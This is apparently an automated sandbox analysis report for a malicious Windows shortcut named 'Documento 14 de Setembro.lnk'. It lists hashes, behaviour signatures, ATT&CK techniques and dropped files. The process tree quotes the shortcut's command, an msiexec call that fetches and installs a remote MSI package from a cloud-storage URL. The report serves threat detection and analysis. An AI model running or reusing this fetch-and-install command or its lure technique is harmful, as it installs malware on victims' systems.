1039cb687f1f997f02bc8d3ad466a1ca6ff37ba055a5d409fd6b446ceeb5e87e

Analysis

max time kernel
136s
max time network
141s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
15-09-2022 06:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Documento 14 de Setembro.lnk
Size

2KB
MD5

2cb7ac7cb6ff4ef4e6ec48659e52baa6
SHA1

66edf5d23da5fb529d9515b5d88e6ba618db25f2
SHA256

1039cb687f1f997f02bc8d3ad466a1ca6ff37ba055a5d409fd6b446ceeb5e87e
SHA512

0f6a4eb6b9effd56ec66fee12474cbc15fe92a72466f1c6892e5d1188ff2da25bcc394d028f9cd34bbb3a4787ba9779009271bb361bc903e61ff244928b0822c

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	908	msiexec.exe
6	908	msiexec.exe
8	908	msiexec.exe

Loads dropped DLL 5 IoCs

pid	Process
1824	MsiExec.exe
1824	MsiExec.exe
1824	MsiExec.exe
1824	MsiExec.exe
1032	MsiExec.exe

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
908	msiexec.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSIA5B2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB147.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB53E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBDC7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\6cc15e.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1ADA.tmp	msiexec.exe
File created	C:\Windows\Installer\6cc15e.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC4BB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC9BC.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	msiexec.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
908	msiexec.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
624	msiexec.exe
624	msiexec.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

description	pid	Process
Token: SeShutdownPrivilege	908	msiexec.exe
Token: SeIncreaseQuotaPrivilege	908	msiexec.exe
Token: SeRestorePrivilege	908	msiexec.exe
Token: SeTakeOwnershipPrivilege	908	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeSecurityPrivilege	624	msiexec.exe
Token: SeCreateTokenPrivilege	908	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	908	msiexec.exe
Token: SeLockMemoryPrivilege	908	msiexec.exe
Token: SeIncreaseQuotaPrivilege	908	msiexec.exe
Token: SeMachineAccountPrivilege	908	msiexec.exe
Token: SeTcbPrivilege	908	msiexec.exe
Token: SeSecurityPrivilege	908	msiexec.exe
Token: SeTakeOwnershipPrivilege	908	msiexec.exe
Token: SeLoadDriverPrivilege	908	msiexec.exe
Token: SeSystemProfilePrivilege	908	msiexec.exe
Token: SeSystemtimePrivilege	908	msiexec.exe
Token: SeProfSingleProcessPrivilege	908	msiexec.exe
Token: SeIncBasePriorityPrivilege	908	msiexec.exe
Token: SeCreatePagefilePrivilege	908	msiexec.exe
Token: SeCreatePermanentPrivilege	908	msiexec.exe
Token: SeBackupPrivilege	908	msiexec.exe
Token: SeRestorePrivilege	908	msiexec.exe
Token: SeShutdownPrivilege	908	msiexec.exe
Token: SeDebugPrivilege	908	msiexec.exe
Token: SeAuditPrivilege	908	msiexec.exe
Token: SeSystemEnvironmentPrivilege	908	msiexec.exe
Token: SeChangeNotifyPrivilege	908	msiexec.exe
Token: SeRemoteShutdownPrivilege	908	msiexec.exe
Token: SeUndockPrivilege	908	msiexec.exe
Token: SeSyncAgentPrivilege	908	msiexec.exe
Token: SeEnableDelegationPrivilege	908	msiexec.exe
Token: SeManageVolumePrivilege	908	msiexec.exe
Token: SeImpersonatePrivilege	908	msiexec.exe
Token: SeCreateGlobalPrivilege	908	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe
Token: SeRestorePrivilege	624	msiexec.exe
Token: SeTakeOwnershipPrivilege	624	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
908	msiexec.exe
908	msiexec.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 1604 wrote to memory of 908	1604	cmd.exe	28
PID 1604 wrote to memory of 908	1604	cmd.exe	28
PID 1604 wrote to memory of 908	1604	cmd.exe	28
PID 1604 wrote to memory of 908	1604	cmd.exe	28
PID 1604 wrote to memory of 908	1604	cmd.exe	28
PID 624 wrote to memory of 1824	624	msiexec.exe	30
PID 624 wrote to memory of 1824	624	msiexec.exe	30
PID 624 wrote to memory of 1824	624	msiexec.exe	30
PID 624 wrote to memory of 1824	624	msiexec.exe	30
PID 624 wrote to memory of 1824	624	msiexec.exe	30
PID 624 wrote to memory of 1824	624	msiexec.exe	30
PID 624 wrote to memory of 1824	624	msiexec.exe	30
PID 624 wrote to memory of 1032	624	msiexec.exe	33
PID 624 wrote to memory of 1032	624	msiexec.exe	33
PID 624 wrote to memory of 1032	624	msiexec.exe	33
PID 624 wrote to memory of 1032	624	msiexec.exe	33
PID 624 wrote to memory of 1032	624	msiexec.exe	33

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Documento 14 de Setembro.lnk"
1⤵
- Suspicious use of WriteProcessMemory
PID:1604
- C:\Windows\System32\msiexec.exe
  "C:\Windows\System32\msiexec.exe" /i "https://i4g.s3.sa-east-1.amazonaws.com/installaaar.msi"
  2⤵
  - Blocklisted process makes network request
  - Use of msiexec (install) with remote resource
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:908

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:624
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 0381FC3C96C0DEF5474786BBB129DD27
  2⤵
  - Loads dropped DLL
  PID:1824
- C:\Windows\system32\MsiExec.exe
  C:\Windows\system32\MsiExec.exe -Embedding A83BB7510E17C927AD859E850A4D2ED0
  2⤵
  - Loads dropped DLL
  PID:1032

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\Installer\MSI1ADA.tmp

Filesize
108.4MB

MD5
182d30fb29b6bff76dd557e55246b8ef

SHA1
7bb2e25286c3b41d6f7c20d60cda076ad87cea77

SHA256
f2d5f80d595128a9c80fd661673655a01912c4eaca381d9e4e484fcbe6af6554

SHA512
1f8122e6efadee856a507109731e60b00a4cae3403bac55dffdd676e5a7a81fd08c8532cd04b250fd6a9509099c358635cc99ba25e8b4348c1409a5a83f71e21

Download Submit
C:\Windows\Installer\MSIA5B2.tmp

Filesize
376KB

MD5
e12c5bcc254c953b1a46d1434804f4d2

SHA1
99f67acf34af1294f3c6e5eb521c862e1c772397

SHA256
5316cfae8b4d28ab7cbc5cab60e27b0c0f5a3210a921a4b0560769c5021c911b

SHA512
9a61aa00b651fc616cd09d28f4a6b872889a026c61d818595a82c58fdff187e3ad57916c2b8690d1e7016d73a05435e13a85758917cfb89029b34c4a1685aa0b

Download Submit
C:\Windows\Installer\MSIB147.tmp

Filesize
376KB

MD5
e12c5bcc254c953b1a46d1434804f4d2

SHA1
99f67acf34af1294f3c6e5eb521c862e1c772397

SHA256
5316cfae8b4d28ab7cbc5cab60e27b0c0f5a3210a921a4b0560769c5021c911b

SHA512
9a61aa00b651fc616cd09d28f4a6b872889a026c61d818595a82c58fdff187e3ad57916c2b8690d1e7016d73a05435e13a85758917cfb89029b34c4a1685aa0b

Download Submit
C:\Windows\Installer\MSIB53E.tmp

Filesize
860KB

MD5
71b541254864bd52f85e932e2040cbe8

SHA1
713766e1818f8d7ca814c86109c9cdd5d57914ef

SHA256
b29ab4744ff6c8c9c440e878abf6f76255c538e71564e6a6279513b543be0538

SHA512
4d2e0a30fd6729eb40fad358795db152327b0441da574052a371762f33c9f9e7b9a77c4a4762207bcb401a2d3ef6438730c245916f4a81cd20f748857d5170d2

Download Submit
C:\Windows\Installer\MSIBDC7.tmp

Filesize
376KB

MD5
e12c5bcc254c953b1a46d1434804f4d2

SHA1
99f67acf34af1294f3c6e5eb521c862e1c772397

SHA256
5316cfae8b4d28ab7cbc5cab60e27b0c0f5a3210a921a4b0560769c5021c911b

SHA512
9a61aa00b651fc616cd09d28f4a6b872889a026c61d818595a82c58fdff187e3ad57916c2b8690d1e7016d73a05435e13a85758917cfb89029b34c4a1685aa0b

Download Submit
C:\Windows\Installer\MSIC9BC.tmp

Filesize
106.2MB

MD5
eeac072023b4dcdb28f7a9c48b46f88a

SHA1
c59d0edcc7e4caca877074978b5f0cabc7631500

SHA256
5e71693441b2efb7c09a64e130d683289023481134dc83a4a5b6c10135495182

SHA512
d21f3bae49d2ebe4d37456512fe24e16ae6fb1d979219e95eca61428176c4e7b94f5a41c767586907a957eb7ab0c2e008ea9b97e019b5460c46d2dc71d30f177

Download Submit
\Windows\Installer\MSIA5B2.tmp

Filesize
376KB

MD5
e12c5bcc254c953b1a46d1434804f4d2

SHA1
99f67acf34af1294f3c6e5eb521c862e1c772397

SHA256
5316cfae8b4d28ab7cbc5cab60e27b0c0f5a3210a921a4b0560769c5021c911b

SHA512
9a61aa00b651fc616cd09d28f4a6b872889a026c61d818595a82c58fdff187e3ad57916c2b8690d1e7016d73a05435e13a85758917cfb89029b34c4a1685aa0b

Download Submit
\Windows\Installer\MSIB147.tmp

Filesize
376KB

MD5
e12c5bcc254c953b1a46d1434804f4d2

SHA1
99f67acf34af1294f3c6e5eb521c862e1c772397

SHA256
5316cfae8b4d28ab7cbc5cab60e27b0c0f5a3210a921a4b0560769c5021c911b

SHA512
9a61aa00b651fc616cd09d28f4a6b872889a026c61d818595a82c58fdff187e3ad57916c2b8690d1e7016d73a05435e13a85758917cfb89029b34c4a1685aa0b

Download Submit
\Windows\Installer\MSIB53E.tmp

Filesize
860KB

MD5
71b541254864bd52f85e932e2040cbe8

SHA1
713766e1818f8d7ca814c86109c9cdd5d57914ef

SHA256
b29ab4744ff6c8c9c440e878abf6f76255c538e71564e6a6279513b543be0538

SHA512
4d2e0a30fd6729eb40fad358795db152327b0441da574052a371762f33c9f9e7b9a77c4a4762207bcb401a2d3ef6438730c245916f4a81cd20f748857d5170d2

Download Submit
\Windows\Installer\MSIBDC7.tmp

Filesize
376KB

MD5
e12c5bcc254c953b1a46d1434804f4d2

SHA1
99f67acf34af1294f3c6e5eb521c862e1c772397

SHA256
5316cfae8b4d28ab7cbc5cab60e27b0c0f5a3210a921a4b0560769c5021c911b

SHA512
9a61aa00b651fc616cd09d28f4a6b872889a026c61d818595a82c58fdff187e3ad57916c2b8690d1e7016d73a05435e13a85758917cfb89029b34c4a1685aa0b

Download Submit
\Windows\Installer\MSIC9BC.tmp

Filesize
106.2MB

MD5
eeac072023b4dcdb28f7a9c48b46f88a

SHA1
c59d0edcc7e4caca877074978b5f0cabc7631500

SHA256
5e71693441b2efb7c09a64e130d683289023481134dc83a4a5b6c10135495182

SHA512
d21f3bae49d2ebe4d37456512fe24e16ae6fb1d979219e95eca61428176c4e7b94f5a41c767586907a957eb7ab0c2e008ea9b97e019b5460c46d2dc71d30f177

Download Submit
memory/1604-54-0x000007FEFB6A1000-0x000007FEFB6A3000-memory.dmp

Filesize
8KB

Download
memory/1824-96-0x0000000075601000-0x0000000075603000-memory.dmp

Filesize
8KB

Download